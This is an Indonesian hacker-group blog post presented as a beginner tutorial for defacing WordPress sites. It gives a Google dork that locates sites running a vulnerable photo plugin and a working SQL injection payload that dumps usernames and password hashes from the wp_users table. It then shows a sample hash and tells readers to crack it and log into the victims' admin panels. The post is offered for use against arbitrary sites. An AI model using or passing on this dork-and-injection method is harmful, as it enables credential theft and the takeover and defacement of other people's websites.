Advertisement
Advertisement
Advertisement

Search

Ingat Kami Disini Hanya Memberi Pengetahuan dan tidak lebih .. Silahkan menggunakan Pengetahuan tersebut dengan bijak,dan kami tidak bertanggung jawab atas apapun yang terjadi! - by CEO,Admin,Author IHC-Team
TEAM KAMI SUDAH BUBAR SEJAK 2016 best Regard AnonGhost.ID | INDONESIA HACKER CYBER TEAM

DEFACE Dengan Exploit WordPres for newbie

Posted by IHC-Team

INDONESIA HACKER CYBER TEAM





                Ya, memang tutorial ini merupakan tutorial lama tapi tidak ada salahnya kan berbagi? Ok simak saja baik - baik.




1. Ketik dork berikut ke kotak pencarian google : inurl:"wp-content/plugins/photoracer/viewimg.php?id="

2. Nantinya akan muncul beberapa web, buka salah satu untuk di eksekusi.


3. Tambahkan exploit ini di belakang url : +union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users
Contoh : www.site.com/wp-content/plugins/photoracer/viewimg.php?id=1 menjadi
www.site.com/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users

4. Nah, nanti bakalan muncul penampakan username dan password dari web tersebut.

Contoh : admin:$P$BfwsoL2ygVgJxpx3lLT9j/0IxRRgDB1

5. Disitu, bentuk password masih berupa salt/MD5. Silahkan anda crack terlebih dahulu, untuk password yang berupa MD5 bisa di crack disini


6. Jika sudah dapat username dan passwordnya, anda login ke web tersebut melalui www.site.com/wp-admin/


POSTED BY : ./Dr.D4fuq404

Related Post



Posting Komentar

~ SEBELUM KOMEN , PERHATIKAN PERATURAN KOMENTAR DI SINI ~

1. Dilarang Komentar Dengan Kata Kasar , PROMOSI , SARA , PORNOGRAFI , SPAM , dan Hal-Hal yg tidak bagus
2. Dilarang koment dengan LINK aktif contoh WEBSITE , BLOG

Visitor

hit counter